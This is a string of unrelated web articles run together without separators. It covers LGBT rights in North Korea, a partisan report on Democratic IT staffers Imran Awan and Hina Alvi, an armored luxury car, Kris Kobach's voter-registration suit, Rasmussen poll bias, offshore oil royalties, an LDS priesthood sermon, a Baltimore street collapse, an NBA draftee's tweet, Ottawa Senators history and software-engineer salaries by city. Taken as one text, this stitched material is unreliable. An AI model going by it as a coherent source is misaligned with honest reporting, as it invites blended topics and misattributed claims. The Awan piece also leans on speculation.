In 2014 , after the United Nations Human Rights Council published a report on human rights in North Korea advising a referral to the International Criminal Court , the official Korean Central News Agency responded with an article that included homophobic insults against report author Michael Kirby , who is openly gay . The KCNA 's article went on to state that gay marriage `` can never be found in the DPRK boasting of the sound mentality and good morals , and homosexuality has become a target of public criticism even in Western countries , too . In fact , it is ridiculous for such gay [ sic ] to sponsor dealing with others ' human rights issue . `` [ 8 ] [ 9 ]
Culture [ edit ]
Defectors have testified that most North Koreans are unaware that any sexual orientation other than heterosexual exists . Most homosexuals only realized after they defected that the idea of homosexuality exists . [ 10 ] [ 11 ]
Summary table [ edit ]
Same-sex sexual activity legal ( No record of anti-gay laws in history ) Equal age of consent ( No record of age of discrepancy in the law . ) Anti-discrimination laws in employment only Anti-discrimination laws in the provision of goods and services Anti-discrimination laws in all other areas ( incl . indirect discrimination , hate speech ) Same-sex marriages Recognition of same-sex couples Step-child adoption by same-sex couples Joint adoption by same-sex couples Gays and lesbians allowed to serve openly in the military ( Due to Conscription . Homosexuals in military are subject to severe punishment including death penalty ) Right to change legal gender Access to IVF for lesbians Commercial surrogacy for gay male couples MSMs allowed to donate blood
See also [ edit ]
Photo credit : americanjournalreview.com
Court documents reveal that a fugitive former Democrat tech staffer has struck a deal with federal officials to return to the country and appear at an arraignment .
The staffer fled the U.S. to seek refuge in Pakistan while under criminal investigation Hina Alvi is the wife of Imran Awan , and both face charges of conspiracy and bank fraud . The couple worked for Democrats for several years , with Awan working directly for Rep. Debbie Wasserman Schultz , D-Florida when she served as the chairwoman of the Democratic National Committee . Awan used to be the lawmaker 's information technology administrator .
The revelation comes from a document filed in the U.S. District Court for the District of Columbia which states that federal prosecutors have arranged a deal with Alvi that would permit her to return to the country . The condition appears to be that she has to return her passport and not book any international travel afterwards . The deal mainly focuses on how Alvi would turn herself in , with a structure that would allow her not to be arrested in front of her children when she returns to the U.S . The document reveals the date of return on the last week of September 2017 .
Alvi and Awan became the focus of investigations by the FBI and Capitol Police about the irregularities for purchases of some computers and other equipment which was later discovered to be missing . The bigger implication is that the couple , and their associates , could have had access to sensitive government information over the years since they were said to have had access also to the emails and files of the more than two dozen House Democrats who employed the couple and their associates on a part-time basis .
The Daily Caller reported in July that the FBI seized smashed hard drives from Awan 's home . The report also said that Awan desperately tried to get back the smashed hard drives .
The pair is also facing charges in which federal officials say that the husband and wife used false information to get home equity lines of credit and had intended to send money overseas , particularly Pakistan where Awan spends significant time even while working in the U.S .
Awan worked for Wasserman Schultz as early as 2005 , shortly after which he started getting his relatives onboard including his wife , two brethren and their wives as IT staffers on the payrolls of other House Democrats . Awan and his relatives collectively had been paid $ 4 million since 2009 . One of the staffers revealed that some of the computers Awan was managing then were being used to transfer data to an off-site server .
Wasserman Schultz was forced to resign as DNC chief in 2016 after the committee 's IT system was hacked . Oddly , she has refused to fire Awan despite knowing he 's under criminal investigation .
National security may have been compromised with the deeds of Awan and relatives .
Source :
http : //www.washingtonexaminer.com/democrat-it-staffer-who-fled-the-country-strikes-deal-to-return-face-charges/article/2633528
We took a close look at the Dartz Kombat T98 whilst we were at this year 's Top Marques Monaco show . It 's a unique machine , fit for even the most eccentric dictator . It 's bold in both design and physicality . Steel plated doors and 7cm thick windows mean that it can withstand attack by both bullets and grenades . When we were informed about this new ‘ Red Diamond ' edition and started reading down the list of extras , we were impressed !
It 's actually scheduled to be displayed at next years Top Marques show . The car itself is actually being marketed under the Prombron name , backed by investment from parent company Dartz . Prombron built armored cars from the late 1910 period for Czar 's and Communist dictators so it 's a fitting modern day re-incarnation .
Moving onto the car , the name comes from the Matte red exterior . From here on , the list is uncompromising . Gold plated , bulletproof windows are promised to compromise the bulletproof 22inch alloys . A tungsten exhaust and tungsten badging and gauges , complemented by white gold gauges encrusted with precious gem stones also add to the list . Extra kevlar coating , just in case you happen to be driving through a war zone , and a Rogue Acoustic Audio System to ensure you ca n't hear the carnage are all included .
Dartz Monaco Red Diamond Edition
A few more interesting specifications are the inclusion of a “ whales penis leather interior ” !
At the moment , Dartz are also working on a deal that would include a Vertu mobile phone in the package with it 's very own panic button .
It 's not all serious however . In fine Russian tradition Dartz will also include three bottles of their ludicrously expensive Russo-Baltique Vodka .
The Monaco Red Diamond Edition is currently in the stages of production so we do n't have many pictures to show you but we 've included a couple of the T98 . They reckon a price between €750,000 and €1 million should be expected . To give you a better idea , the T98 at Top Marques was sold for €700,000 . For more info contact Dartz through their website .
Dartz Kombat T98
Kansas secretary of state and national voter suppression advocate Kris Kobach has been struggling in recent months to implement a new “ proof of citizenship ” voter registration requirement that he pushed into law . But now he has a new plan : sue the federal government to make it harder to register to vote with a federal form in his state .
Like a similar Arizona law that was recently struck down by the Supreme Court , Kansas ' law requires those registering to vote to produce documented proof of citizenship beyond the sworn oath required on federal voter registration forms . This has produced an administrative nightmare in Kansas , throwing the voting status of at least 15,000 people who registered with the federal form into limbo .
Kobach 's first plan to fix this was to force the thousands of Kansans who had registered with the federal form to cast provisional ballots in the next election , which would then only count if they showed up later at an elections office armed with a birth certificate or other citizenship document . The state board of elections rejected the plan , which one Republican state senator called “ disingenuous at best . ”
Kobach then got creative , suggesting that Kansas create two classes of voters , with those who register with the federal form only allowed to vote in federal elections . Voting rights advocates balked .
Now , Kobach has a new plan . Along with Arizona Secretary of State Ken Bennett , Kobach is suing the U.S. Election Assistance Commission to require the federal government to add extra “ proof of citizenship ” requirements to federal voter registration forms in the two states . Andy Marso at the Topeka Capital-Journal sums up the scheme :
Facing the possibility of legal action over 15,000-plus suspended voter registrations , Secretary of State Kris Kobach struck back by announcing Wednesday his own suit against a federal election commission . Kobach said at a news conference that he and Arizona Secretary of State Ken Bennett , both Republicans , have filed a complaint against the U.S. Election Assistance Commission asking that federal voter registration forms issued to residents of their states include state-specific proof of citizenship requirements like the ones on state forms largely responsible for putting thousands of Kansas registrations on hold . Kobach said the court case is “ the first of its kind. ” Kansas voters will be best served when the EAC amends the Kansas-specific instructions on the Federal Form to include submitting concrete evidence of U.S. citizenship when registering to vote , ” Kobach said . Kobach said the lawsuit would partially preempt a suit being prepared but he is American Civil Liberties Union over the suspended registrations . “ It does block many of the arguments the ACLU might wish to raise , ” Kobach said .
Kobach explains that he is answering the “ invitation ” that Justice Antonin Scalia left in his opinion in the Arizona case , in which the justice suggested that Arizona try such a move .
Rasmussen polls were , once again , significantly biased in favor of Republicans .
An analysis of polling from 13 of the most important swing states in the 2012 presidential election found that Rasmussen Polls overestimated Republican Mitt Romney 's standing by 3.25 % .
None of the 13 Rasmussen polls overestimated support for Democrat Barack Obama .
This 2010 piece by fivethirtyeight.com 's Nate Silver about the performance of Rassmussen polls during the 2010 midterm elections found they too were biased :
Rasmussen 's polls were quite biased , overestimating the standing of the Republican candidate by almost 4 points on average .
Rasmussen did n't do much better this year . Considered the lynchpin to the presidency for both candidates , Rasmussen 's final poll ( 11/4 ) from Ohio was off by nearly 2 % in favor of Romney . In Michigan , the 11/1 poll overestimated Romney 's support by 2.9 % . In New Hampshire ( 11/4 ) , it was 3.4 % . And in Iowa , Rasmussen 's 10/30 poll predicted a 1-point Romney victory : Obama carried the state by 5.6 % .
Silver 's 2010 analysis suggests a few reasons why Rasmussen polls were statistically biased in favor of Republicans : the exclusive use of landlines when contacting respondents , and the failure to call back phone numbers if a caller does n't pick up ( instead moving to a new number ) were among them .
Silver also offered this :
Rasmussen also weights their surveys based on preordained assumptions about the party identification of voters in each state , a relatively unusual practice that many polling firms consider dubious
In 2012 's election cycle , the first concern should have been alleviated : Rasmussen uses Pulse Opinion Research LLC for their polls , and their methodology page offers this :
To reach those who have abandoned traditional landline telephones , Rasmussen Reports uses an online survey tool to interview randomly selected participants from a demographically diverse panel .
During the entirety of 2012 campaign ( not just near the end ) , Rasmussen polls often overstated Republican strength in comparison to other polls . Those less Republican-leaning polls often came under fire for a supposed Democratic bias , notably by Romney 's campaign itself .
Rasmussen polls have now significantly overstated Republican strength in two consecutive election cycles .
The 13 swing states analyzed , using Rasmussen 's last polls in those states ranging from Oct. 21 to Nov. 4 , were Ohio , Florida , Virginia , Iowa , New Hampshire , Pennsylvania , Michigan , Colorado , Nevada , Michigan , North Carolina , Indiana , and Missouri .
All polling data can be found at RealClearPolitics.com .
Mistake by Interior Department may cost taxpayers billions in lost royalty payments
June 8th , 2008 by Rod Adams
The General Accountability Office released a report on June 5 , 2008 that computed that the US Treasury may have to forgo oil royalty payments in excess of $ 53 Billion over the next 25 years because of an error made by the Interior Department . This forgone money is not uncollected taxes , it is the government 's ( taxpayers 's ) share of the revenue produced by selling oil that originated from reservoirs under publicly owned sea beds .
Here is what happened . Congress , recognizing that drilling in deep water is difficult and costly , passed a law in 1995 giving the Interior Department 's Minerals Management Service authority to provide “ royalty relief ” for off shore leases . For those who do not keep long term oil prices readily at hand , the price of a barrel of oil in 1995 was between $ 12 and $ 18 . For the leases issued under this authority in 1996 , 1997 , and 2000 , the MMS included a trigger price where royalty payments would begin if market prices reached certain levels .
For some reason that is not well explained , the MMS failed to include any trigger price limit for the leases issued in 1998 and 1999 . The production from areas leased during those two years may be royalty free for the entire length of the lease , no matter how high oil prices get . ( In 1998 , oil prices dipped below $ 10 per barrel in the late fall . )
The GAO report provides a number of scenarios that show how the lost revenues to the government will vary depending on actual production and prices and there is quite a range in the estimates from a low of a few billion to a high ( assuming oil prices of $ 100 per barrel ) of about $ 53 Billion . Of course , we all know that $ 100 per barrel might be a low ball estimate for future prices since we have already seen prices in excess of $ 130 per barrel .
Of course the oil companies are fighting any ex post facto imposition of royalty payments for 1998 and 1999 probably with good justification . However , what really gets me fired up is that Kerr-McGee has challenged the Interior Department 's authority to impose the trigger price for any of the years in question . I also felt like yelling at the radio when I heard that an oil industry spokesman defended the royalty free production as important for encouraging companies to drill domestic wells for improved energy security .
According to ExxonMobil 's summary annual report for 2007 ( available in the investor information section of the company 's web site ) it has spent $ 118 Billion during the years 2003-2007 simply purchasing its own stock . Its capital investment program for new drilling , tankers , pipelines , etc . was less than $ 90 billion during the same period . The company leadership has a right and a responsibility for making prudent capital allocation decisions , but please do not try to tell me that even a majority of the money saved by not paying royalties is plowed back into providing more energy resources for consumers .
ExxonMobil is not alone in its use of capital for stock buybacks instead of new drilling programs – see , for example Chevron Announces Stock Buyback Program
Though I am generally not a huge fan of government investment programs , it seems to me that even the Department of Energy could figure out ways to invest several billion dollars in new energy supply technology instead of using it to buy financial instruments like company stock .
Oops – I just realized that I might be confusing some people by advocating that the government could do a better job when I started the article with a description of a “ mistake ” ( or was it – see Interior Staff Had Inappropriate Relationships with Oil Industry ) by government employees that led to the loss of revenue in the first place . I guess I a just a hopeless romantic that believes that there could be such a thing as “ good government ” if we return to the concept of “ public servants ” who really do focus on developing career expertise and a service mindset . For you young people – such a thing used to be possible !
Photo credit – Rigjobs.co.uk
Related posts :
3 Hidden Costs of High Oil Prices
Texas Company Will Recycle Offshore Oil Platforms for Wind Turbines
One of my most vivid memories is attending priesthood meeting as a newly ordained deacon and singing during the opening hymn , “ Come , all ye sons of God who have received the priesthood. ” 1 Tonight , to all assembled here in the Conference Center and , indeed , throughout the world , I echo the spirit of that special hymn and say to you : Come , all ye sons of God who have received the priesthood , let us consider our callings ; let us reflect on our responsibilities ; let us determine our duty ; and let us follow Jesus Christ , our Lord . While we may differ in age , in custom , or in nationality , we are united as one in our priesthood callings .
To each of us , the restoration of the Aaronic Priesthood to Oliver Cowdery and Joseph Smith by John the Baptist is most significant . Likewise , the restoration of the Melchizedek Priesthood to Joseph and Oliver by Peter , James , and John is a cherished event .
Let us take most seriously the callings , the responsibilities , and the duties which come with the priesthood we hold .
I felt a great responsibility when I was called to be secretary of my deacons quorum . I prepared most conscientiously the records I kept , for I wanted to do the very best I knew how to do in that calling . I took great pride in my work . Doing all I can , to the very best of my ability , has been my goal in any position I have ever held .
I hope each young man who has been ordained to the Aaronic Priesthood is given a spiritual awareness of the sacredness of his ordained calling , as well as opportunities to magnify that calling . I received such an opportunity as a deacon when the bishopric asked that I take the sacrament to a shut-in who lived about a mile from our chapel . That special Sunday morning , as I knocked on Brother Wright 's door and heard his feeble voice call , “ Come in , ” I entered not only his humble cottage but also a room filled with the Spirit of the Lord . I approached Brother Wright 's bedside and carefully placed a piece of the bread to his lips . I then held the cup of water , that he might drink . As I departed , I saw tears in his eyes as he said , “ God bless you , my boy. ” And God did bless me—with an appreciation for the sacred emblems of the sacrament and for the priesthood which I held .
No deacon , teacher , or priest from our ward will ever forget the memorable visits we made to Clarkston , Utah , to the gravesite of Martin Harris , one of the Three Witnesses of the Book of Mormon . As we surrounded the tall granite shaft which marks his grave , and as one of the quorum leaders read to us those penetrating words from “ The Testimony of Three Witnesses , ” found at the beginning of the Book of Mormon , we developed a love for that sacred record and for the truths found therein .
During those years our objective was to become as the sons of Mosiah . Of them it was said :
“ They had waxed strong in the knowledge of the truth ; for they were men of a sound understanding and they had searched the scriptures diligently , that they might know the word of God .
“ But this is not all ; they had given themselves to much prayer , and fasting ; therefore they had the spirit of prophecy , and the spirit of revelation , and when they taught , they taught with power and authority of God. ” 2
I can not think of a more worthy goal for a young man to have than to be described as were the valiant and righteous sons of Mosiah .
As I approached my 18th birthday and prepared to enter the mandatory military service required of young men during World War II , I was recommended to receive the Melchizedek Priesthood , but first I needed to telephone my stake president , Paul C. Child , for an interview . He was one who loved and understood the holy scriptures , and it was his intent that all others should similarly love and understand them . Having heard from some of my friends of his rather detailed and searching interviews , I desired minimum exposure of my scriptural knowledge ; therefore , when I called him I suggested we meet the following Sunday at a time I knew was just an hour before his sacrament meeting time .
His response : “ Oh , Brother Monson , that would not provide us sufficient time to peruse the scriptures. ” He then suggested a time three hours before his sacrament meeting , and he instructed me to bring with me my personally marked and referenced set of scriptures .
When I arrived at his home on Sunday , I was greeted warmly , and then the interview began . President Child said , “ Brother Monson , you hold the Aaronic Priesthood . Have you ever had angels minister to you ? ” I replied that I had not . When he asked if I knew I was entitled to such , I again replied that I had not known .
He instructed , “ Brother Monson , repeat from memory the 13th section of the Doctrine and Covenants . ”
I began , “ ‘ Upon you my fellow servants , in the name of Messiah I confer the Priesthood of Aaron , which holds the keys of the ministering of angels— ' ”
“ Stop , ” President Child directed . Then , in a calm , kindly tone , he counseled , “ Brother Monson , never forget that as a holder of the Aaronic Priesthood you are entitled to the ministering of angels . ”
It was almost as though an angel were in the room that day . I have never forgotten the interview . I yet feel the spirit of that solemn occasion as we together read of the responsibilities , the duties , and the blessings of the Aaronic Priesthood and the Melchizedek Priesthood—blessings which come not only to us but also to our families and to others we will have the privilege to serve .
I was ordained an elder , and on the day of my departure for active duty with the navy , a member of my ward bishopric joined my family and friends at the train station to bid me farewell . Just before train time , he placed in my hand a small volume titled Missionary Handbook . I laughed and commented that I was n't going on a mission .
He answered , “ Take it anyway . It may come in handy . ”
It did . I needed a hard , rectangular object to place in the bottom of my seabag so that my clothing would stay more firm and would thus be less wrinkled . The Missionary Handbook was just what I needed , and it served well in my seabag for 12 weeks .
The night before our Christmas leave , our thoughts were of home . The barracks were quiet , but then the silence was broken by my buddy in the adjoining bunk—a Mormon boy , Leland Merrill—who began to moan in pain . I inquired concerning the reason , and he said he felt really sick . He did not want to go to the base dispensary , for he knew that doing such would prevent his going home the following day .
He seemed to grow worse as the hours passed . Finally , knowing that I was an elder , he asked me to give him a priesthood blessing .
I had never before given a priesthood blessing , I had never received a blessing , and I had never witnessed a blessing being given . As I prayed silently for help , I remembered the Missionary Handbook in the bottom of my seabag . I quickly emptied the bag and took the book to the night-light . There I read how one blesses the sick . With many curious sailors looking on , I proceeded with the blessing . Before I could put everything back into my bag , Leland Merrill was sleeping like a child . He awakened the following morning feeling fine . The gratitude each of us felt for the power of the priesthood was immense .
The years have brought me more opportunities to provide blessings to those in need than I could possibly count . Each opportunity has found me deeply grateful that God has entrusted to me this sacred gift . I revere the priesthood . I have witnessed its power time and time again . I have seen its strength . I have marveled at the miracles it has wrought .
Brethren , each of us has been entrusted with one of the most precious gifts ever bestowed upon mankind . As we honor our priesthood and live our lives so that we are at all times worthy , the blessings of the priesthood will flow through us . I love the words found in the Doctrine and Covenants , section 121 , verse 45 , which tell us what we must do to be worthy : “ Let thy bowels … be full of charity towards all men , and to the household of faith , and let virtue garnish thy thoughts unceasingly ; then shall thy confidence wax strong in the presence of God ; and the doctrine of the priesthood shall distil upon thy soul as the dews from heaven . ”
As bearers of the priesthood of God , we are engaged in the work of the Lord Jesus Christ . We have answered His call ; we are on His errand . Let us learn of Him . Let us follow in His footsteps . Let us live by His precepts . By so doing , we will be prepared for any service He calls us to perform . This is His work . This is His Church . Indeed , He is our captain , the King of Glory , even the Son of God . I testify that He lives and bear this witness in His holy name , the name of Jesus Christ , amen .
Nearly a year after a rain-saturated retaining wall collapsed , tossing trees , cars and half of a Baltimore street into a railway ravine below , completion of the 26th Street rebuild is expected to linger into late May .
With all major infrastructure done , including a handsome new wall of poured concrete molded to look like stone , the unit block of East 26th Street will emerge with new street lights , wider sidewalks , decorative brick work and freshly-planted trees .
Residents of the block 's brightly-painted Victorian rowhouses , who have endured months of heavy construction outside their front parlors , will soon return to the pre-collapse status quo of living on a quaint and quiet street in Charles Village .
It was last April 30 , at 3:45 p.m. , when the century-old railway retaining wall began to writhe and shake , acting as if some sci-fi creature were trying to break free from the ground below .
Moments later , the entire wall gave way . Tons of earth , rock , trees , paving material and nearly a dozen cars toppled into the CSX railway line 30 feet below the street . The collapse took just seconds and sounded like an earthquake , a bystander told The Brew .
Miraculously , no one was injured .
Only an hour earlier , students from the Margaret Brent Elementary/Middle School had skipped and walked and lugged their book bags along the now-vanished sidewalk . Busy St. Paul Street , its western flank lying less than 30 feet from the ruined wall , was unscathed .
Months of Tell-Tale Signs
The immediate cause of the wall 's failure was attributed to “ epic rain events. ” In the previous two days , more than 5 inches of rain had fallen in Baltimore . Residents said cracks and dips appeared in the roadway during the rains , while the sidewalk next to the retaining wall had visibly buckled .
But there were signs of the street 's structural distress long before the rains . For 12 to 14 months “ citizens repeatedly reported soil erosion , settlement , potholes , sidewalk caving and similar conditions along 26th Street ” to city officials and CSX Transportation , a four-page post-mortem of the collapse by the Department of Transportation subsequently confirmed .
The complaints were funneled through the bureaucracy . Transportation employees responded with maintenance inspections and quick fixes ( filling in the cracks and potholes with asphalt ) , and referred the complaints to the Department of Public Works . DPW examined the water and sewer lines under 26th Street and concluded they were fine .
CSX inspected its right-of-way below the cut and , also finding it to be fine , told residents that “ the city was the appropriate party for the complaints , ” according to the August 2014 report .
The report added these observations :
• “ There was no engineering survey performed on the wall or failing sidewalk by DOT or CSX . ”
• “ Personnel from the city and CSX who performed visual inspections were not licensed Professional Structural or Geotechnical Engineers . ”
• “ There should have been more coordination by CSX and the city . . . to determine why the sidewalk and adjacent curb and roadway were under distress . ”
The report concluded that the cause of the collapse was indeterminable . “ While we look at available information and discuss possible scenarios , the definite conditions which ultimately caused the collapse remain inconclusive due to the lack of exploratory information which may not become available even during extensive excavation of the failure area during the reconstruction phase . ”
Laying immediate blame on heavy rains and a harsh winter , DOT said it would hire consultants to perform structural inspections of infrastructure along the CSX right-of-way “ with a goal of prioritizing areas of concern within the next 12 months . ”
Even before the wall collapsed , one area of concern was the deteriorating condition of the Sisson Street Bridge over CSX in nearby Remington . DOT has not yet announced whether it has completed the structural inspections .
High Cost of Rebuilding
At the time of the incident , the Rawlings-Blake administration was preparing to include a $ 350,000 expenditure for rehabbing 26th Street in its 2015 budget .
The money was to go for the “ excavation and rehabilitation of the sub-base material on the roadway ” and for “ necessary repairs to walkways , ” according to the collapse report .
The city has since spent many times that amount fixing the damage and rebuilding the road . The latest estimate is $ 15 million , Budget Director Andrew W. Kleine told the City Council last month .
This includes $ 11.98 million awarded to Concrete General Inc. in a no-bid contract last July by the Board of Estimates as well as design work by Whitman , Requardt & Associates and such budgeted incidentals as $ 500,000 for “ flagging ” CSX freight trains that resumed operations days after the wall failure .
One reason for the project 's high cost ( and lengthy period of construction ) was the need for a temporary wall to shore up 26th Street and protect residential buildings and city infrastructure from further deterioration .
The temporary wall was replaced by the recently completed permanent wall , reinforced by deep steel pilings , on the south side of 26th Street .
No Payments from CSX
CSX agreed to contribute “ up to 50 % or $ 10 million to the cost of the repairs ” and further to share “ the costs of any and all third-party lawsuits relating to the event , ” according to a memorandum of understanding released by the city last August .
This would indicate an amount due of about $ 7.5 million , which would reduce the cost to taxpayers by an equal sum .
So far , CSX has not made any payments , Kleine told the City Council , and he did not know when payments might be expected .
As they say , what you put on the internet never goes away . And Terrance Ferguson will learn that the hard way after being drafted by the Thunder .
Ferguson was a Warriors fan . And during last year 's Western Conference Finals after Klay Thompson dropped 11 three-pointers on their heads , Ferguson dropped one more bomb on the OKC faithful . ( He 's since deleted the tweet . )
SHOTS . FIRED . ( Throw some air horns in right here for good measure . )
And , you wo n't believe it , but this gets better . FERGUSON IS ACTUALLY FROM OKLAHOMA ! He was born in Tulsa but his family moved to Texas when he was younger .
Of course , Twitter did not hesitate to let Ferguson know what they thought about him rooting for the Warriors .
SMH YOU FROM OKLAHOMA TOO ? — Doug ( @ EvanDRoberts ) June 23 , 2017
They even used Russell Westbrook gif to demonstrate .
Twitter can be savage , yes . We all know . But at least one person tried to offer Ferguson some good advice here .
But the receipts are there . Even if Ferguson deletes this tweet , we still know where his allegiances were all these years .
But , hey , it 's just Twitter . We 've all got some things we could probably go back and delete . Things change . Ferg knows what 's up . He 's on the Thunder now and he 's ready to ball like he was born to do .
And now , for sure , we know Ferguson is 100 percent a Thunder fan .
# ThunderUp
Thank You God — Terrance Ferguson ( @ the2kferguson ) June 23 , 2017
Typically we 've used this space on `` Memorable Monday '' to look back at some of the highlights of the 2013 NHL season for the Ottawa Senators . Given that today carries with it much more history than the Mondays we have looked at to-date , we 're going to flash back to 2003 and one of the biggest days in Sens history .
On August 26 , 2003 , Eugene Melnyk officially took ownership of the Ottawa Senators hockey club and ( what is now called ) Canadian Tire Centre . The transfer of ownership was part of a long process , which ultimately saved the Senators from bankruptcy and , moreover , kept the team in Ottawa after a period of financial uncertainty .
Since then , the Sens have made the playoffs seven times in nine tries , and posting a 364-264-85 ( .577 ) record over that span .
Now , let 's go back and take a look at Mr. Melnyk 's first ever press conference as owner of the Ottawa Senators ...
What is the best city in the world for a software engineer ? San Francisco ? New York ?
From a salary standpoint , Silicon Valley is the clear winner , boasting an average income of $ 110,554 per year , according to data from Glassdoor . But even with six-figure salaries , many developers are finding it difficult to afford the sky-high rent in the Bay Area .
But if not the Valley , then where should developers go ? It is not enough to only consider nominal income — high living costs can eat away at your earning power .
For a more complete analysis , we compared the real earnings of software engineers in 43 cities across the globe to find where they would have the most purchasing power . Real earnings were calculated as follows :
Real Earnings = Income - Taxes - Social Security - Living Costs - Rent
Quick Summary of Our Results
Seattle is the clear winner , with wages close to those in Silicon Valley but with significantly lower rent costs . Also , cities in the United States ranked higher than international cities across the board , with few exceptions . Interestingly , San Jose ( our proxy for Silicon Valley ) , still ranked 3rd of 21 cities in the U.S. , whereas San Francisco is in at 19th , again , due to difference in rent .
On the East Coast , New York and Washington , D.C. fared even worse , taking the last two spots respectively . Phoenix took second , and Austin and Houston rounded out the top 5 . Internationally , Tel Aviv , cities in Canada , and Berlin are our recommendations . Our data suggest you avoid London , Singapore , and China , contrary to what one might expect .
Methodology
Previously , Glassdoor listed the “ 25 Best Paying Cities for Software Engineers ” in the U.S. and calculated a “ Real Adjusted Salary ” by scaling salary with a cost-of-living factor . Their model ranks San Jose and San Francisco as number 2 and 3 on their list respectively , contrary to anecdotal evidence . It is worth noting that they indicate that San Jose has a higher cost of living than San Francisco , while our data will show you why it 's quite the opposite .
What does `` scaling income with cost of living mean ? '' It is a way to put all cities with different costs of living on equal footing . Here is Glassdoor 's formula :
Scaled Income = ( ( average cost of living ) / ( actual cost of living ) ) * Base Income
But scaling income with cost of living is not a very accurate way to compare across cities . People just want to know how much money will be in their pocket at the end of each year .
Instead of scaling income like Glassdoor , we used our real earnings formula to calculate the earnings of an average software engineer living alone in the city , and used that as a ranking metric . This leads to vastly different results .
Real Earnings = Income - Taxes - Social Security - Living Costs - Rent
Since tax takes out a significant portion of each paycheck and varies regionally , we used the same Glassdoor base-salary numbers to calculate the after-tax income for each city , and then subtracted average annual living and rent costs , based on data from Numbeo . You do n't want to move to a city with few job openings , so we chose cities with a large number of job listings , and expanded our scope globally .
U.S. Cities : Findings
United States with higher salaries
Cities in the United States beat out nearly all international cities , and so to simplify things , we separated the two into different rankings . We will refer to non-U.S. cities as “ international ” cities , from now on .
Most assume that although wages are lower abroad , lower living costs are enough to compensate . With a lower base-salary , your real earnings will be lowed , but even as a ratio of living costs , wages abroad typically can not compete with those in the United States . For more information , see our “ Affordability ” section below .
Pack your bags for Seattle
Our data confirm the findings of similar reports , suggesting that Seattle is the best place for a software engineer right now . Companies like Amazon and Microsoft raise the average wage to a value close to Silicon Valley 's ; however , lower rent means more money in your pocket each month .
Phoenix , Austin , and Houston all seem to be good choices as well , with real earnings above $ 30,000 . These markets are still growing though , nearing the bottom of our list for number of job openings . Raleigh , North Carolina comes in at 6th just below Houston , but again , the job market there is relatively small .
See our mobile , software , and web app developers in Seattle →
Rent is more influential than cost of living
From the chart above , you may have noticed the disparity between San Jose , at 3rd , and San Francisco , at 19th . These two cities are often grouped into the same category of “ Bay Area ” . Why do regions with similar markets and geographic proximity have such different real earnings ?
Our data suggest salary and cost of living are nearly identical , but cheaper rent in San Jose makes the difference .
Living costs do not vary dramatically across cities , but rents do . For example , take a look at Phoenix in third with an average rent of $ 972 per month , whereas San Francisco in nineteenth with an average rent of $ 3272 per month .
Washington D.C. , New York , and Boston have the largest software engineer job markets outside the Bay Area , but sky-high rents push them to the bottom of the list . Washington D.C. has the largest number of job openings in our analysis , but below average salary and high costs make it the worst choice among large U.S. cities .
International Cities : Findings
Check out Tel Aviv , and Do n't Forget Canada
Beyond the cities in the U.S. , we wanted to know more about international cities as well . We chose the cities mentioned in similar reports as either established or “ emerging ” tech hubs and ran the numbers for them . Keep in mind that nearly all the cities listed below do not outnumber their U.S. counterparts in both real earnings and number of job openings .
Oslo tops the list in terms of earning power , but we did not mention it earlier because the job market is the smallest among the 43 cities we analyzed in this report . Compare its 106 job offerings to 22,554 in New York City .
Your best bet is Tel Aviv . It is a fairly mature tech hub , with the second highest real earnings and a reasonably sized tech market . Furthermore , there are tax breaks available for new immigrants to the country , which are not included in our tax calculation .
Canada makes a good showing as well . Toronto , Montreal , and Vancouver take spots 3 , 4 , and 5 on our list for real earnings . Also , the job markets for all three cities exceed Tel Aviv . Berlin , often mentioned as a strong European tech hub , is not far behind in 6th .
Bangalore is worth a mention as well . It has one of the most software engineer job openings in the world , exceeding San Francisco and San Jose , and only inferior to New York and Washington D.C . In contrast , it has the lowest average pre-tax income in U.S. dollar terms for all the cities we considered .
Costs are low abroad , but so are salaries
In most cases , the living costs internationally are much lower than in the United States , but not so low that they compensate for the drop in salary .
London 's real earnings is below-average internationally , and in turn , much lower than cities in the United States , according to our data . Another city that may surprise you is Beijing . Many people are excited about the technological innovation there , and local startups have preferential access to a huge , yet unique , domestic market . However , our data suggest that , in strictly financial terms , there are better options .
Singapore and Hong Kong 's real earnings values are near zero . Warsaw and Moscow 's are even lower , to the point that we calculate a negative value for real earnings . This means that if you are a software engineer making an average salary in one of these three cities , you can not afford to rent a single apartment in the city-center .
Other Factors to Consider
Affordability
Lower wages internationally usually means lower earnings , even with lower living costs . Perhaps it is more important to consider income as a ratio to expenses . We calculated an “ affordability ” ratio for international cities , which is after-tax income divided by expenses , then indexed it to San Francisco . Thus , the “ affordability ” of San Francisco is defined as 100 , and a value of 150 means the city in question is 50 % more “ affordable ” than San Francisco .
Income Multiple = ( After-tax Income/Expenses )
Index Value of City A = 100 * ( Income Multiple of City A ) / ( Income Multiple of SF )
For the most part , this gives a similar ranking to real earnings . More interesting is the placement of San Francisco . While San Francisco is not particularly affordable ( most U.S. cities have values above 100 ) , about half of international cities have a lower ratio . So even considering income as a ratio to expenses , international cities struggle to compete .
Hire front-end developers in San Francisco with CodementorX
Quality of Life :
To give some non-financial context for each city , we cite Numbeo 's Quality of Life Index , which is a weighted index based on several factors :
cost of living and purchasing power
affordability of housing , pollution ( including air , water , etc . )
crime rates , health system quality , and traffic ( commute times )
This number is not indexed so it is just a means for comparison . Since there is less of a stark contrast between U.S. and international cities , we included all global cities below except for Baltimore and Detroit , which did not have sufficient data to calculate the index .
Many international cities exceed the largest cities in the U.S . Consider , for example , that 13 of 22 international cities exceed New York . Beside Melbourne , 10 of the top 11 spots are all smaller American cities . Take these results as you will ; some have mentioned it might weigh pollution too heavily .
Our model assumes that you are a software engineer living alone in the city with an average software engineer salary . Although your personal “ real earnings ” may vary widely depending on job role , marital status , and living situation , we find it reasonable to use this as a proxy . For example , we assume that if a software engineer is paid more in New York , then a web developer will also be paid higher in New York . This is simply a way for us to compare “ apples to apples ” across cities .
Secondly , we are not tax professionals , and it is possible we made a mistake ( respect for you accountants out there— international tax code is quite a doozy ) . We assume you are a resident of the country for the full-tax year . To get the real earnings , we deducted income tax , local social security payments and mandatory insurance contributions . We assume you are not being doubly taxed by your home country if you are not a citizen of the country in question .
Finally , inherent biases may arise from our data sets . Salary and job openings data are from Glassdoor , cost of living and rent is from Numbeo , and tax calculations are from the IRS and KPMG . Notably , there were less salary and job data for international cities , so in some cases , we used other sources . For example , we used Chinese websites to find data for Beijing and Shanghai . Also , it is possible there are less job listings for international cities simply because Glassdoor is based in the United States .
The raw data we used can be found here .
Conclusion
Here , it behooves us to say that there are many other factors for software engineers to consider when choosing a city to live in , but we hope this may be a starting point for your decision . Sometimes the cities perceived to be the most “ exciting ” or to have the most “ opportunity ” are in fact the worst choices in terms of real earnings .
